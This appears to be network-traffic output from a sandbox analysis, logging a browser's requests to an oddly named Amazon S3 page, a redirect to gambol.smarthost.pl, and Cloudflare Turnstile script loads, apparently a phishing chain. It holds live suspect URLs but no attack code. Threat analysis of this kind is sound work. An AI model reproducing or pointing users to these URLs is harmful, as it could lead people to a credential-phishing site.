                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Sec-Fetch-Site: none
                                                                                      Sec-Fetch-Mode: navigate
                                                                                      Sec-Fetch-User: ?1
                                                                                      Sec-Fetch-Dest: document
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-11-15 17:08:44 UTC414INHTTP/1.1 200 OK
                                                                                      x-amz-id-2: G0K4jbl7ggtEQR0USAoAA5i+DptANU9xY/7Jtu5EdBJcLKTf+GxEqA7Pl9TjPJ2VozflY3o837w=
                                                                                      x-amz-request-id: 1ECY332TH5NRF6A8
                                                                                      Date: Fri, 15 Nov 2024 17:08:45 GMT
                                                                                      Last-Modified: Thu, 14 Nov 2024 13:33:31 GMT
                                                                                      ETag: "41dad0b2fc99d22ebf4c2be76918601c"
                                                                                      x-amz-server-side-encryption: AES256
                                                                                      Accept-Ranges: bytes
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 2038
                                                                                      Server: AmazonS3
                                                                                      Connection: close
                                                                                      2024-11-15 17:08:44 UTC2038INData Raw: 0d 0a 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 2f 2a 20 43 65 6e 74 65 72 20 74 68 65 20 6d 65 73 73 61 67 65 20 6f 6e 20 74 68 65 20 73 63 72 65 65 6e 20 2a 2f 0d 0a 20 20 20 20 20 20 62 6f 64 79 2c 20 68 74 6d 6c 20 7b 0d 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0d 0a 20 20 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72
                                                                                      Data Ascii: <html> <head> <style> /* Center the message on the screen */ body, html { height: 100%; margin: 0; display: flex; justify-content: center; align-items: center; font-family: Ar


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.2.164971352.218.122.884437040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-15 17:08:45 UTC748OUTGET /favicon.ico HTTP/1.1
                                                                                      Host: s3.eu-west-1.amazonaws.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                      Sec-Fetch-Site: same-origin
                                                                                      Sec-Fetch-Mode: no-cors
                                                                                      Sec-Fetch-Dest: image
                                                                                      Referer: https://s3.eu-west-1.amazonaws.com/patnla.chivivemie/mandlas%23%2377374%23etikos3438%2324737%23madbviewmine%23%26%23%26%23portca3737%237347739%23737373%2334773%2383838%23.html
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-11-15 17:08:45 UTC285INHTTP/1.1 403 Forbidden
                                                                                      x-amz-request-id: YJ63PRYS3FZ3PJRQ
                                                                                      x-amz-id-2: xHU5IVcc970Hie/RP0Egi2pvhf05sd8/yzpH1JNbPHHEFxhehIyTnbQ4bGW3pbmsRTDetzqXHgo=
                                                                                      Content-Type: application/xml
                                                                                      Transfer-Encoding: chunked
                                                                                      Date: Fri, 15 Nov 2024 17:08:45 GMT
                                                                                      Server: AmazonS3
                                                                                      Connection: close
                                                                                      2024-11-15 17:08:45 UTC254INData Raw: 66 33 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 41 63 63 65 73 73 44 65 6e 69 65 64 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 4d 65 73 73 61 67 65 3e 3c 52 65 71 75 65 73 74 49 64 3e 59 4a 36 33 50 52 59 53 33 46 5a 33 50 4a 52 51 3c 2f 52 65 71 75 65 73 74 49 64 3e 3c 48 6f 73 74 49 64 3e 78 48 55 35 49 56 63 63 39 37 30 48 69 65 2f 52 50 30 45 67 69 32 70 76 68 66 30 35 73 64 38 2f 79 7a 70 48 31 4a 4e 62 50 48 48 45 46 78 68 65 68 49 79 54 6e 62 51 34 62 47 57 33 70 62 6d 73 52 54 44 65 74 7a 71 58 48 67 6f 3d 3c 2f 48 6f 73 74 49 64 3e 3c 2f 45 72 72 6f 72 3e 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: f3<?xml version="1.0" encoding="UTF-8"?><Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>YJ63PRYS3FZ3PJRQ</RequestId><HostId>xHU5IVcc970Hie/RP0Egi2pvhf05sd8/yzpH1JNbPHHEFxhehIyTnbQ4bGW3pbmsRTDetzqXHgo=</HostId></Error>0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      2192.168.2.164971552.149.20.212443
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-15 17:08:47 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=f2cH6mg7mwxXTxP&MD=9XaRWou8 HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Accept: */*
                                                                                      User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                      Host: slscr.update.microsoft.com
                                                                                      2024-11-15 17:08:47 UTC560INHTTP/1.1 200 OK
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      Content-Type: application/octet-stream
                                                                                      Expires: -1
                                                                                      Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                      ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                      MS-CorrelationId: 2642e9e1-1b51-434f-a41b-c99f25e2ccc6
                                                                                      MS-RequestId: 39f59071-cd16-4bf6-ab68-b3449ade50c7
                                                                                      MS-CV: QnkgcfhK3Um7IyqV.0
                                                                                      X-Microsoft-SLSClientCache: 2880
                                                                                      Content-Disposition: attachment; filename=environment.cab
                                                                                      X-Content-Type-Options: nosniff
                                                                                      Date: Fri, 15 Nov 2024 17:08:47 GMT
                                                                                      Connection: close
                                                                                      Content-Length: 24490
                                                                                      2024-11-15 17:08:47 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                      Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                      2024-11-15 17:08:47 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                      Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      3192.168.2.164971891.211.222.2504437040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-15 17:08:47 UTC707OUTGET /amdhcrviewpmt HTTP/1.1
                                                                                      Host: gambol.smarthost.pl
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Upgrade-Insecure-Requests: 1
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: navigate
                                                                                      Sec-Fetch-Dest: document
                                                                                      Referer: https://s3.eu-west-1.amazonaws.com/
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-11-15 17:08:47 UTC226INHTTP/1.1 301 Moved Permanently
                                                                                      Date: Fri, 15 Nov 2024 17:08:47 GMT
                                                                                      Server: Apache
                                                                                      Location: https://gambol.smarthost.pl/amdhcrviewpmt/
                                                                                      Content-Length: 250
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                      2024-11-15 17:08:47 UTC250INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 61 6d 62 6f 6c 2e 73 6d 61 72 74 68 6f 73 74 2e 70 6c 2f 61 6d 64 68 63 72 76 69 65 77 70 6d 74 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://gambol.smarthost.pl/amdhcrviewpmt/">here</a>.</p></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      4192.168.2.164971791.211.222.2504437040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-15 17:08:47 UTC708OUTGET /amdhcrviewpmt/ HTTP/1.1
                                                                                      Host: gambol.smarthost.pl
                                                                                      Connection: keep-alive
                                                                                      Upgrade-Insecure-Requests: 1
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: navigate
                                                                                      Sec-Fetch-Dest: document
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Referer: https://s3.eu-west-1.amazonaws.com/
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-11-15 17:08:48 UTC568INHTTP/1.1 200 OK
                                                                                      Date: Fri, 15 Nov 2024 17:08:48 GMT
                                                                                      Server: Apache
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      Set-Cookie: PHPSESSID=4e927ff4cd1f8500dee1e5063e16de2e; path=/
                                                                                      Set-Cookie: cookie_test=test; expires=Fri, 15-Nov-2024 18:08:48 GMT; Max-Age=3600; path=/
                                                                                      Upgrade: h2,h2c
                                                                                      Connection: Upgrade, close
                                                                                      Vary: Accept-Encoding
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      X-Frame-Options: sameorigin
                                                                                      Transfer-Encoding: chunked
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      2024-11-15 17:08:48 UTC2679INData Raw: 61 37 30 0d 0a 20 20 20 20 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e e2 81 a4 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20
                                                                                      Data Ascii: a70 <!DOCTYPE html> <html lang="en"> <head> <title></title> <meta charset="UTF-8"> <meta name="robots" content="noindex, nofollow"> <meta name="viewport" content="width=device-width, initial-scale=1.0">
                                                                                      2024-11-15 17:08:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      5192.168.2.1649722104.18.95.414437040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-15 17:08:49 UTC547OUTGET /turnstile/v0/api.js HTTP/1.1
                                                                                      Host: challenges.cloudflare.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: no-cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://gambol.smarthost.pl/
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-11-15 17:08:49 UTC386INHTTP/1.1 302 Found
                                                                                      Date: Fri, 15 Nov 2024 17:08:49 GMT
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      access-control-allow-origin: *
                                                                                      cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                                      cross-origin-resource-policy: cross-origin
                                                                                      location: /turnstile/v0/b/22755d9a86c9/api.js
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8e30d872ccece75a-DFW
                                                                                      alt-svc: h3=":443"; ma=86400


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      6192.168.2.1649723104.18.95.414437040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-15 17:08:50 UTC562OUTGET /turnstile/v0/b/22755d9a86c9/api.js HTTP/1.1
                                                                                      Host: challenges.cloudflare.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: no-cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://gambol.smarthost.pl/
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-11-15 17:08:50 UTC471INHTTP/1.1 200 OK
                                                                                      Date: Fri, 15 Nov 2024 17:08:50 GMT
                                                                                      Content-Type: application/javascript; charset=UTF-8
                                                                                      Content-Length: 47672
                                                                                      Connection: close
                                                                                      accept-ranges: bytes
                                                                                      last-modified: Mon, 28 Oct 2024 19:08:47 GMT
                                                                                      cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                      access-control-allow-origin: *
                                                                                      cross-origin-resource-policy: cross-origin
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8e30d877a9c66b1d-DFW
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      2024-11-15 17:08:50 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 6c 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 6c 5d 28 67 29 2c 75 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 66 29 7b 6e 28 66 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 75 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 75 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                      Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,l,g){try{var h=e[l](g),u=h.value}catch(f){n(f);return}h.done?r(u):Promise.resolve(u).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);funct
                                                                                      2024-11-15 17:08:50 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                                      Data Ascii: e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                                      2024-11-15 17:08:50 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 6a 74 28 65 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 47 74 28 65 2c 72 29 7c 7c 7a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 44 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30
                                                                                      Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function D(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(l[0
                                                                                      2024-11-15 17:08:50 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 59 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 71 3b 28 66 75
                                                                                      Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var q;(fu
                                                                                      2024-11-15 17:08:50 UTC1369INData Raw: 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 24 7c 7c 28 24 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20
                                                                                      Data Ascii: .NEVER="never",e.MANUAL="manual",e.AUTO="auto"})($||($={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var
                                                                                      2024-11-15 17:08:50 UTC1369INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 6c 77 61 79 73 22 2c 22 65 78 65 63 75 74 65 22 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 51 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 74 72 75 65 22 2c 22 66 61 6c 73 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 24 74 3d 33 30 30 2c 4a 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 68 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28
                                                                                      Data Ascii: }function gt(e){return M(["always","execute","interaction-only"],e)}function Qt(e){return M(["true","false"],e)}function yt(e){return M(["render","execute"],e)}var $t=300,Jt=10;function ht(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(
